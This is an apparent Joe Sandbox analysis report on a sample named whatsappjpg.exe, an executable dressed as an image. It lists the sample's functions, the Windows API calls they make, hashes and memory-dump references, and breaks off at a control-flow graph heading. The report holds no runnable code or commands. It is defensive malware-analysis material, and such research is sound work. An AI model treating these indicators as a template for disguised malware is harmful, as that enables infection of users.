Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 10001617 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
GlobalFree.KERNEL32(00000000), ref: 1000165A

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00405939
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00405943
lstrcatW.KERNEL32(?,00409014), ref: 00405955

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405933

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 100015CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225

lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
wsprintfW.USER32 ref: 1000160A

Strings

s<u, xrefs: 1000160A

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: AllocGloballstrcpywsprintf
String ID: s<u
API String ID: 2689062267-779365171
Opcode ID: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
Instruction ID: 1bcf6e6733af89869fae1c20b53ab816a204ac51a82716e0e01f59040c2558f4
Opcode Fuzzy Hash: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
Instruction Fuzzy Hash: F8E0D830600821E7F121D7649C44ACD37A8FF412E67164115F706E618DCB228A424689

Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,004037F4,76F93420,0040361F,?), ref: 00403837
GlobalFree.KERNEL32(?), ref: 0040383E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-297319885
Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\whatsappjpg.exe,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405985
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\whatsappjpg.exe,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy
String ID:
API String ID: 852173138-0
Opcode ID: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
Opcode Fuzzy Hash: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Analysis Process: whatsappjpg.exePID: 1284, Parent PID: 7484COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	89.7%
Signature Coverage:	0%
Total number of Nodes:	39
Total number of Limit Nodes:	2

Executed Functions

Function 394D0040 Relevance: 3.0, Instructions: 2999COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f68d6a68d584140a832fd97940d35243e8a7262c8b958f94c9052a408748aa0
Instruction ID: 1c443091e4a844577a7acec3cf7788ea8569bfa4caab649c3ec5ae9088a50956
Opcode Fuzzy Hash: 6f68d6a68d584140a832fd97940d35243e8a7262c8b958f94c9052a408748aa0
Instruction Fuzzy Hash: 95631A35D10B5A8ADB11EF68C894599F7B1FF99300F15C79AE4487B221FB70AAC4CB81

Function 394D0012 Relevance: 2.4, Instructions: 2434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38e3ea5032a6d25bff684276e49b9065853b250c20c95d32650bdc4e5567abfa
Instruction ID: 5a15027380ca257cbdf95a3b9d6bc027ff72b5f572a3766b3de3f5453654c00e
Opcode Fuzzy Hash: 38e3ea5032a6d25bff684276e49b9065853b250c20c95d32650bdc4e5567abfa
Instruction Fuzzy Hash: B043F631C10B5A8ADB51EF68C894599F7B1FF99300F11D79AE4487B221FB70AAD4CB81

Function 394D32B8 Relevance: 2.2, Instructions: 2229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 576e48c164b4ce713b2fc99cd2abc03042dc967df86e6ebafd78ea5a0a40d225
Instruction ID: 2f681e49d9a110edea2c3bcfffd1d41fde975398e4d81130d394f057c1d6a8a0
Opcode Fuzzy Hash: 576e48c164b4ce713b2fc99cd2abc03042dc967df86e6ebafd78ea5a0a40d225
Instruction Fuzzy Hash: 03332B35D10B598EDB11EF68C89469DF7B1FF89300F14C79AE449A7221EB70AAC5CB81

Function 394D8730 Relevance: 1.8, Strings: 1, Instructions: 596
COMMON

Download Yara Rule

Control-flow Graph

